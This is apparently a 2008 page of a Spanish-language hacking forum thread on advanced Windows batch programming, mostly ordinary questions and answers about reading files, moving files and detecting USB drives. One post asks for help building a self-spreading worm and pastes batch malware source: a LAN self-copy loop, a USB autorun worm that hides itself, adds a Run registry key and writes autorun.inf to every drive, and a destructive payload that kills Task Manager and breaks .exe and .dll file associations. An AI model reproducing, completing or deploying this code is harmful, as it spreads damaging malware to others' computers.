elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  -> Programación BATCH Avanzada. (nuevo)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 20 21 Ir Abajo Respuesta Imprimir
Autor Tema: -> Programación BATCH Avanzada. (nuevo)  (Leído 472,761 veces)
sib85

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: -> Programación BATCH Avanzada. (nuevo)
« Respuesta #80 en: 25 Septiembre 2008, 00:07 am »

Hola::

Tengo una duda un poco urgente, ¿Como puedo leer sólo la primera linea de un fichero txt?

lo que tengo que hacer es pasar un script de linux a windows y recrear la funcion
head -1 de shell script. Había pensado en un for, pero no se cómo poner el límite de 1 sola línea.

Muchas gracias de antemano :)

Nieves


En línea

augustocgg

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: -> Programación BATCH Avanzada. (nuevo)
« Respuesta #81 en: 29 Septiembre 2008, 04:48 am »

Hola

Me pueden ayudar de como hago para programar el siguiente bat

el bat me tiene que copiar archivos de una carpeta especificada, y solamente tienen que ser los archivos creados en el mes en curso de windows

la validacion seria solor por el mes en curso del sistema

Gracias a todos


En línea

flony


Desconectado Desconectado

Mensajes: 583



Ver Perfil
Re: -> Programación BATCH Avanzada. (nuevo)
« Respuesta #82 en: 7 Octubre 2008, 21:14 pm »

hola quisiera mover unos archivos que tengo en una carpeta a otra y que pueda distinguir entre .doc y .txt si me dan una mano seria barbaro
En línea

si un problema no tiene solucion entonces no es un problema...es algo inevitable
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: -> Programación BATCH Avanzada. (nuevo)
« Respuesta #83 en: 7 Octubre 2008, 21:32 pm »

Hola, con el comando move alcanza, simplemente utilizas el comodín *

Código
  1. move *.doc carpetadestino
  2. move *.txt carpetadestino

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
chill@321

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: -> Programación BATCH Avanzada. (nuevo)
« Respuesta #84 en: 10 Octubre 2008, 22:21 pm »

 :huh: tengo duda como se programa para que se prenda la compu  :huh:
En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: -> Programación BATCH Avanzada. (nuevo)
« Respuesta #85 en: 17 Octubre 2008, 03:09 am »

jajaja, osea remotamente? o con un timeout? o como? depende que quieras hacer...
En línea

devil_boskonovitch

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: -> Programación BATCH Avanzada. (nuevo)
« Respuesta #86 en: 1 Noviembre 2008, 17:13 pm »

Hola muchachos...!!!

Entro para ver si me podrian ayudar con unos codigos BAT...

Es que necesito un BAT que haga lo siguiente:

Que se propague por memorias USB, disco duros y particiones...!!!
Y que se pueda propagar en una RED LOCAL y que se autoejecute en las PC infectadas....


Hace ratico... encontre estos codigos de propagacion de red local, pero no me han funcionado:

Código:
@echo off
set/a ip=192.168.1.1
:mode
copy %0 > \\%ip%
start %0 at\\%ip%
set/a ip=ip+1
goto mode

Y este otro:

Código:
@echo off
set/a ip=192.168.1.1
:mode
copy %0 > \\%ip%
start %0 at\\%ip%
set/a ip=ip+1
if ip 192.168.1.255 goto salir else goto mode
:salir
exit

Me mandan error...

Y encontre este para que se propague en USB:

Código:
@echo off
attrib +s +h %0
msg * hacked by -={ naxo itc }=-
reg add hklm\software\microsoft\windows\currentversion\run /V Dump.exe /D C:\Drivers\Dump.exe /f

:bluce
ping -n 10 127.0.0.1
IF exist C:\Drivers (goto 02) else (md C:\Drivers & attrib +h +s C:\Drivers & goto 02)
:02
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\Drivers (goto a) else (md %%A:\Drivers & attrib +h +s %%A:\Drivers & goto a) )

:a
IF exist C:\Drivers\Dump.exe (goto 05) else (goto 04)
:04
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -s -h %%A:\Drivers\Dump.exe & copy "%%A:\Drivers\Dump.exe" "C:\Drivers\Dump.exe" & attrib +s +h %%A:\Drivers\Dump.exe)
attrib +h +s C:\Drivers\Dump.exe
:05
IF exist C:\autorun.inf (goto 07) else (goto 06)
:06
echo [AutoRun]>>C:\autorun.inf
echo label= naxo itc>>C:\autorun.inf
echo open=Drivers\Dump.exe>>C:\autorun.inf
echo shellexecute=Drivers\Dump.exe>>C:\autorun.inf
echo shell\Auto\command=Drivers\Dump.exe>>C:\autorun.inf
attrib +h +s C:\autorun.inf
:07
for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" C:\autorun.inf') do set co=%%B
if naxo== %co% (goto b) else (goto nar)
:nar
attrib -h -s C:\autorun.inf
del /f /q C:\autorun.inf
goto 06

:b
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\Drivers\Dump.exe (goto 0Cool else (attrib -s -h C:\Drivers\Dump.exe & copy "C:\Drivers\Dump.exe" "%%A:\Drivers\Dump.exe" & attrib +h +s %%A:\Drivers\Dump.exe & attrib +s +h C:\Drivers\Dump.exe & goto 0Cool )
:08
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\autorun.inf (goto 09) else (attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf & attrib +h +s C:\autorun.inf & goto bluce) )

:09
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" %%A:\autorun.inf') do set co=%%B )
if naxo== %co% (goto bluce) else (goto her)
:her
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -h -s %%A:\autorun.inf & del /f /q %%A:\autorun.inf )
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf & attrib +h +s C:\autorun.inf & goto bluce )

En este.. la amenaza no se copia a la carpeta Drivers que crea el BAT...????? Aun cambiando el nombre de la amenaza por un BAT, no se aplica...???

El codigo que quiero propagar es este:

Código:
@echo off
taskkill /im taskmgr.exe
msg * BURLANDO TODAS LAS DEFENSAS DE TU EQUIPO
CD C:\Program Files\
assoc .exe=txtfile
assoc .dll=batfile
CD C:\Documents ans Settings\All Users\Desktop
echo YO HE DESTRUIDO TODOS TUS PROGRAMAS > Hola.txt
exit

Cualquier ayuda se la agradecería....Mucho...!!!

Saludos...
« Última modificación: 1 Noviembre 2008, 17:15 pm por devil_boskonovitch » En línea

patovica

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: -> Programación BATCH Avanzada. (nuevo)
« Respuesta #87 en: 2 Noviembre 2008, 15:02 pm »

Cuales son las intrucciones para que detecte un pendrive. O sea, quiero que pregunte si el pendrive esta conectado o no, no importa lo que sigue, yo lo que quiero saber es cual es la instruccion para detectar el pendrive.
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: -> Programación BATCH Avanzada. (nuevo)
« Respuesta #88 en: 2 Noviembre 2008, 18:50 pm »

Cuales son las intrucciones para que detecte un pendrive. O sea, quiero que pregunte si el pendrive esta conectado o no, no importa lo que sigue, yo lo que quiero saber es cual es la instruccion para detectar el pendrive.
if exist E:\
algo asi ?
saludos
En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: -> Programación BATCH Avanzada. (nuevo)
« Respuesta #89 en: 2 Noviembre 2008, 18:54 pm »

Mira este codigo detecta las unidades removibles (para sistemas en español) :
Código:
@echo off
for /f "tokens=3" %%x in ('echo list volume ^| diskpart ^| find /i "Extra"') do (echo %%x:)
pause>nul

Comandos que podrian servirte :
Código:
wmic logicaldisk get caption
Código:
fsutil fsinfo drives
Código:
echo list volume | diskpart

Ahora prueba este codigo aver si te sirve :
Código:
@echo off
for /f "tokens=2 skip=1" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x | find /i "extra"
)
for /f "tokens=1 skip=2" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x | find /i "extra"
)
pause>nul
Código:
@echo off
for /f "tokens=2 skip=1" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x
)
for /f "tokens=1 skip=2" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x
)
pause>nul
exit /b


Saludos.
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 20 21 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Programacion avanzada - Inline Asm/C (Muy bueno)
Programación Visual Basic
Tughack 4 2,746 Último mensaje 8 Agosto 2007, 02:40 am
por Freeze.
[G] Libro Programacion Avanzada en Ensamblador!!!
ASM
-Gosw- 3 8,519 Último mensaje 27 Mayo 2009, 10:40 am
por -Gosw-
algunas dudas en programacion BATCH(nuevo en esto de programacion)
Scripting
stock_C 8 8,970 Último mensaje 19 Junio 2009, 18:08 pm
por frank30
[Taller] Programacion Avanzada en C/C++ (Linux)
Programación C/C++
[L]ord [R]NA 0 6,364 Último mensaje 4 Octubre 2010, 04:53 am
por [L]ord [R]NA
Unix programacion avanzada
Unix/Unix-Like
sesiopower 1 7,506 Último mensaje 1 Marzo 2014, 20:13 pm
por Joe Fraddy
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines